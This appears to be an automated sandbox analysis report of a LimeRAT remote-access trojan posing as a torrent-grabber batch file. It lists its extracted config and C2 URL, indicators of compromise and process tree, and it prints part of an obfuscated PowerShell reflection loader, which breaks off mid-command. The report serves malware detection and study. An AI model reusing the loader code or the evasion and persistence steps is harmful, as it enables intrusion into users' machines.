limerat | 0f37d1f0afe84c414064c003bb3ec5b979c5c0ff7fcba972e06acc4d3fd3e115

Analysis

max time kernel
150s
max time network
150s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
23-01-2023 21:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

STEAMLOADZ TORRENT GRABBER.bat
Size

4KB
MD5

a46a2dcaf4ade017b7a1abb5eeeef85b
SHA1

18f930b3659452bc17fbb5589c624a04c4832369
SHA256

0f37d1f0afe84c414064c003bb3ec5b979c5c0ff7fcba972e06acc4d3fd3e115
SHA512

9822645e42b0842abd63072aee4232afdd90d0f54bd0f6e83ad7e9337638a8adda95b8e8eb92b23c1ead6cc81de4aee6c94f86798d24af6bb530c5bca2dc3132
SSDEEP

96:sQA5zScHWAH80DAwgQCYaYNmYwo8r7x0xA1HkxextfIUr7xAxZK1yNmYwr/AnCRO:sr5zScHWAH80DAwZ5aYNdwlnKSVkobf0

Score

10^/10

limerat evasion rat

Malware Config

Extracted

Family

limerat

Attributes

aes_key
$13377331$
antivm
true
c2_url
https://pastebin.com/raw/wA0i3ncn
delay
3
download_payload
false
install
true
install_name
Microsoft Edge.exe
main_folder
UserProfile
pin_spread
false
sub_folder
\Microsoft\Edge\Application\Microsoft Edge\
usb_spread
false

Signatures

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 15 IoCs

Processes:

torrentdecrypt.exepowershell.EXEsvchost.exeupdater.exedialer.exe

description	pid	Process	procid_target
PID 4184 created 2588	4184	torrentdecrypt.exe	39
PID 4184 created 2588	4184	torrentdecrypt.exe	39
PID 4184 created 2588	4184	torrentdecrypt.exe	39
PID 4184 created 2588	4184	torrentdecrypt.exe	39
PID 4184 created 2588	4184	torrentdecrypt.exe	39
PID 3916 created 584	3916	powershell.EXE	3
PID 3740 created 3928	3740	svchost.exe	35
PID 3740 created 3724	3740	svchost.exe	36
PID 4800 created 2588	4800	updater.exe	39
PID 4800 created 2588	4800	updater.exe	39
PID 4800 created 2588	4800	updater.exe	39
PID 4800 created 2588	4800	updater.exe	39
PID 4800 created 2588	4800	updater.exe	39
PID 536 created 2588	536	dialer.exe	39
PID 4800 created 2588	4800	updater.exe	39

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow	pid	Process
2	1176	powershell.exe
3	5088	powershell.exe
5	1956	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

Processes:

torrentdecrypt.exeupdater.exe

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	torrentdecrypt.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

Executes dropped EXE 8 IoCs

Processes:

DOWNLOADLIST.exearchive.exeupdate.exeextractor.exemsedge.exetorrentdecrypt.exeMicrosoft Edge.exeupdater.exe

pid	Process
4428	DOWNLOADLIST.exe
2252	archive.exe
944	update.exe
4972	extractor.exe
4940	msedge.exe
4184	torrentdecrypt.exe
4760	Microsoft Edge.exe
4800	updater.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 6 IoCs

Processes:

powershell.EXEpowershell.exepowershell.EXEpowershell.exe

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

torrentdecrypt.exepowershell.EXEupdater.exe

description	pid	Process	procid_target
PID 4184 set thread context of 2836	4184	torrentdecrypt.exe	132
PID 3916 set thread context of 2652	3916	powershell.EXE	139
PID 4800 set thread context of 536	4800	updater.exe	165
PID 4800 set thread context of 1012	4800	updater.exe	171

Drops file in Program Files directory 4 IoCs

Processes:

torrentdecrypt.exeupdater.execmd.execmd.exe

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	torrentdecrypt.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
1880	sc.exe
4964	sc.exe
4956	sc.exe
4304	sc.exe
1468	sc.exe
3672	sc.exe
2652	sc.exe
4908	sc.exe
596	sc.exe
4628	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
788	3724	WerFault.exe	36
4764	3928	WerFault.exe	35

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exe

pid	Process
4712	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.exepowershell.exeWMIC.exedialer.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetorrentdecrypt.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEdllhost.exe

pid	Process
2268	powershell.exe
2268	powershell.exe
2268	powershell.exe
1176	powershell.exe
1176	powershell.exe
1176	powershell.exe
4524	powershell.exe
4524	powershell.exe
4524	powershell.exe
5088	powershell.exe
5088	powershell.exe
5088	powershell.exe
1628	powershell.exe
1628	powershell.exe
1628	powershell.exe
2668	powershell.exe
2668	powershell.exe
2668	powershell.exe
1956	powershell.exe
1956	powershell.exe
1956	powershell.exe
1548	powershell.exe
1548	powershell.exe
1548	powershell.exe
4184	torrentdecrypt.exe
4184	torrentdecrypt.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
4184	torrentdecrypt.exe
4184	torrentdecrypt.exe
4184	torrentdecrypt.exe
4184	torrentdecrypt.exe
4184	torrentdecrypt.exe
4184	torrentdecrypt.exe
4884	powershell.exe
4884	powershell.exe
4884	powershell.exe
4184	torrentdecrypt.exe
4184	torrentdecrypt.exe
4184	torrentdecrypt.exe
4184	torrentdecrypt.exe
4092	powershell.exe
4092	powershell.exe
4092	powershell.exe
3916	powershell.EXE
3916	powershell.EXE
4856	powershell.EXE
3916	powershell.EXE
4856	powershell.EXE
4856	powershell.EXE
3916	powershell.EXE
2652	dllhost.exe
2652	dllhost.exe
2652	dllhost.exe
2652	dllhost.exe
2652	dllhost.exe
2652	dllhost.exe
2652	dllhost.exe
2652	dllhost.exe
2652	dllhost.exe
2652	dllhost.exe
2652	dllhost.exe
2652	dllhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid	Process
656

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exeMicrosoft Edge.exe

description	pid	Process
Token: SeDebugPrivilege	2268	powershell.exe
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	4524	powershell.exe
Token: SeIncreaseQuotaPrivilege	4524	powershell.exe
Token: SeSecurityPrivilege	4524	powershell.exe
Token: SeTakeOwnershipPrivilege	4524	powershell.exe
Token: SeLoadDriverPrivilege	4524	powershell.exe
Token: SeSystemProfilePrivilege	4524	powershell.exe
Token: SeSystemtimePrivilege	4524	powershell.exe
Token: SeProfSingleProcessPrivilege	4524	powershell.exe
Token: SeIncBasePriorityPrivilege	4524	powershell.exe
Token: SeCreatePagefilePrivilege	4524	powershell.exe
Token: SeBackupPrivilege	4524	powershell.exe
Token: SeRestorePrivilege	4524	powershell.exe
Token: SeShutdownPrivilege	4524	powershell.exe
Token: SeDebugPrivilege	4524	powershell.exe
Token: SeSystemEnvironmentPrivilege	4524	powershell.exe
Token: SeRemoteShutdownPrivilege	4524	powershell.exe
Token: SeUndockPrivilege	4524	powershell.exe
Token: SeManageVolumePrivilege	4524	powershell.exe
Token: 33	4524	powershell.exe
Token: 34	4524	powershell.exe
Token: 35	4524	powershell.exe
Token: 36	4524	powershell.exe
Token: SeDebugPrivilege	5088	powershell.exe
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeDebugPrivilege	1956	powershell.exe
Token: SeDebugPrivilege	1548	powershell.exe
Token: SeDebugPrivilege	732	powershell.exe
Token: SeIncreaseQuotaPrivilege	732	powershell.exe
Token: SeSecurityPrivilege	732	powershell.exe
Token: SeTakeOwnershipPrivilege	732	powershell.exe
Token: SeLoadDriverPrivilege	732	powershell.exe
Token: SeSystemProfilePrivilege	732	powershell.exe
Token: SeSystemtimePrivilege	732	powershell.exe
Token: SeProfSingleProcessPrivilege	732	powershell.exe
Token: SeIncBasePriorityPrivilege	732	powershell.exe
Token: SeCreatePagefilePrivilege	732	powershell.exe
Token: SeBackupPrivilege	732	powershell.exe
Token: SeRestorePrivilege	732	powershell.exe
Token: SeShutdownPrivilege	732	powershell.exe
Token: SeDebugPrivilege	732	powershell.exe
Token: SeSystemEnvironmentPrivilege	732	powershell.exe
Token: SeRemoteShutdownPrivilege	732	powershell.exe
Token: SeUndockPrivilege	732	powershell.exe
Token: SeManageVolumePrivilege	732	powershell.exe
Token: 33	732	powershell.exe
Token: 34	732	powershell.exe
Token: 35	732	powershell.exe
Token: 36	732	powershell.exe
Token: SeShutdownPrivilege	4192	powercfg.exe
Token: SeCreatePagefilePrivilege	4192	powercfg.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeShutdownPrivilege	2016	powercfg.exe
Token: SeCreatePagefilePrivilege	2016	powercfg.exe
Token: SeShutdownPrivilege	1248	powercfg.exe
Token: SeCreatePagefilePrivilege	1248	powercfg.exe
Token: SeShutdownPrivilege	2380	powercfg.exe
Token: SeCreatePagefilePrivilege	2380	powercfg.exe
Token: SeDebugPrivilege	4760	Microsoft Edge.exe
Token: SeDebugPrivilege	4760	Microsoft Edge.exe
Token: SeIncreaseQuotaPrivilege	4884	powershell.exe
Token: SeSecurityPrivilege	4884	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

powershell.exedwm.exe

pid	Process
1628	powershell.exe
1628	powershell.exe
1020	dwm.exe
1020	dwm.exe

Suspicious use of SendNotifyMessage 2 IoCs

Processes:

powershell.exe

pid	Process
1628	powershell.exe
1628	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

archive.exe

pid	Process
2252	archive.exe
2252	archive.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.execmd.exeDOWNLOADLIST.exepowershell.exeupdate.exeextractor.execmd.exe

description	pid	Process	procid_target
PID 4556 wrote to memory of 4844	4556	cmd.exe	67
PID 4556 wrote to memory of 4844	4556	cmd.exe	67
PID 4844 wrote to memory of 2268	4844	cmd.exe	69
PID 4844 wrote to memory of 2268	4844	cmd.exe	69
PID 4844 wrote to memory of 1176	4844	cmd.exe	70
PID 4844 wrote to memory of 1176	4844	cmd.exe	70
PID 4844 wrote to memory of 4504	4844	cmd.exe	71
PID 4844 wrote to memory of 4504	4844	cmd.exe	71
PID 4504 wrote to memory of 3600	4504	cmd.exe	73
PID 4504 wrote to memory of 3600	4504	cmd.exe	73
PID 4504 wrote to memory of 4524	4504	cmd.exe	74
PID 4504 wrote to memory of 4524	4504	cmd.exe	74
PID 4504 wrote to memory of 5088	4504	cmd.exe	76
PID 4504 wrote to memory of 5088	4504	cmd.exe	76
PID 4504 wrote to memory of 4428	4504	cmd.exe	77
PID 4504 wrote to memory of 4428	4504	cmd.exe	77
PID 4504 wrote to memory of 4428	4504	cmd.exe	77
PID 4428 wrote to memory of 1956	4428	DOWNLOADLIST.exe	86
PID 4428 wrote to memory of 1956	4428	DOWNLOADLIST.exe	86
PID 4428 wrote to memory of 1956	4428	DOWNLOADLIST.exe	86
PID 4504 wrote to memory of 2828	4504	cmd.exe	85
PID 4504 wrote to memory of 2828	4504	cmd.exe	85
PID 4504 wrote to memory of 3808	4504	cmd.exe	83
PID 4504 wrote to memory of 3808	4504	cmd.exe	83
PID 4504 wrote to memory of 1944	4504	cmd.exe	78
PID 4504 wrote to memory of 1944	4504	cmd.exe	78
PID 4504 wrote to memory of 4820	4504	cmd.exe	79
PID 4504 wrote to memory of 4820	4504	cmd.exe	79
PID 4504 wrote to memory of 1268	4504	cmd.exe	80
PID 4504 wrote to memory of 1268	4504	cmd.exe	80
PID 4504 wrote to memory of 1664	4504	cmd.exe	82
PID 4504 wrote to memory of 1664	4504	cmd.exe	82
PID 4504 wrote to memory of 1628	4504	cmd.exe	81
PID 4504 wrote to memory of 1628	4504	cmd.exe	81
PID 4504 wrote to memory of 2668	4504	cmd.exe	87
PID 4504 wrote to memory of 2668	4504	cmd.exe	87
PID 1956 wrote to memory of 2252	1956	powershell.exe	88
PID 1956 wrote to memory of 2252	1956	powershell.exe	88
PID 1956 wrote to memory of 2252	1956	powershell.exe	88
PID 1956 wrote to memory of 944	1956	powershell.exe	89
PID 1956 wrote to memory of 944	1956	powershell.exe	89
PID 1956 wrote to memory of 944	1956	powershell.exe	89
PID 944 wrote to memory of 1548	944	update.exe	90
PID 944 wrote to memory of 1548	944	update.exe	90
PID 944 wrote to memory of 1548	944	update.exe	90
PID 944 wrote to memory of 4972	944	update.exe	91
PID 944 wrote to memory of 4972	944	update.exe	91
PID 944 wrote to memory of 4940	944	update.exe	92
PID 944 wrote to memory of 4940	944	update.exe	92
PID 944 wrote to memory of 4940	944	update.exe	92
PID 944 wrote to memory of 4184	944	update.exe	95
PID 944 wrote to memory of 4184	944	update.exe	95
PID 4972 wrote to memory of 2232	4972	extractor.exe	94
PID 4972 wrote to memory of 2232	4972	extractor.exe	94
PID 2232 wrote to memory of 4772	2232	cmd.exe	98
PID 2232 wrote to memory of 4772	2232	cmd.exe	98
PID 2232 wrote to memory of 4592	2232	cmd.exe	99
PID 2232 wrote to memory of 4592	2232	cmd.exe	99
PID 2232 wrote to memory of 4804	2232	cmd.exe	100
PID 2232 wrote to memory of 4804	2232	cmd.exe	100
PID 2232 wrote to memory of 4812	2232	cmd.exe	101
PID 2232 wrote to memory of 4812	2232	cmd.exe	101
PID 2232 wrote to memory of 1300	2232	cmd.exe	102
PID 2232 wrote to memory of 1300	2232	cmd.exe	102

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:664

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:584
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:1020
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{beb545d8-845f-41df-b0a7-881712327365}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2652

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:748

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:340

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:648

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:720

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1044
- c:\windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2744
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:PWfBJLQgXHyA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aGYRzzizVceKDW,[Parameter(Position=1)][Type]$qAyitKZroL)$oNIvDuevcPC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+'f'+'lec'+'t'+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+'a'+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+'y'+'p'+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'Se'+[Char](97)+''+[Char](108)+''+'e'+'d,A'+[Char](110)+'s'+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+'A'+''+'u'+''+'t'+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$oNIvDuevcPC.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'lN'+[Char](97)+'m'+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+'B'+''+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$aGYRzzizVceKDW).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+''+','+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+'d'+'');$oNIvDuevcPC.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'N'+'ew'+'S'+''+[Char](108)+''+'o'+'t'+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$qAyitKZroL,$aGYRzzizVceKDW).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+''+[Char](105)+'m'+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $oNIvDuevcPC.CreateType();}$eKxtjCfdQTsaT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t.W'+'i'+'n'+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+'a'+[Char](102)+''+'e'+''+[Char](101)+''+'K'+''+[Char](120)+''+[Char](116)+''+[Char](106)+'Cf'+'d'+'Q'+[Char](84)+''+[Char](115)+''+'a'+''+'T'+'');$YQvHdBchbfivEM=$eKxtjCfdQTsaT.GetMethod('Y'+'Q'+''+[Char](118)+''+[Char](72)+'dB'+[Char](99)+''+'h'+''+[Char](98)+'f'+[Char](105)+''+[Char](118)+'E'+'M'+'',[Reflection.BindingFlags]'P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+''+[Char](116)+'atic',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SWSLiIQVoAGSbFruKQA=PWfBJLQgXHyA @([String])([IntPtr]);$MPMlIDbMwImvietlRoRAFE=PWfBJLQgXHyA 